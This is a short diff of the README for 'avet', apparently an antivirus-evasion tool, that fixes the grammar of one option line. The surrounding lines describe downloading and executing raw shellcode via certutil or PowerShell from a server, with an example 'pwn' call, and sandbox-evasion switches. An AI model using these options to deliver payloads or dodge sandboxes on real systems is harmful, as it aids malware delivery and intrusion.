govolution/avet/README.md

       usage of -d certutil/powershell in combination with -f for executing the raw shellcode after downloading
       call: pwn thepayload.bin http://server/thepayload.bin
--E use avets ASCII encryption, often do not has to be used Can be used with -l
+-E use avets ASCII encryption, often this does not have to be used Can be used with -l
 -F use fopen sandbox evasion
 -k "killswitch" sandbox evasion with gethostbyname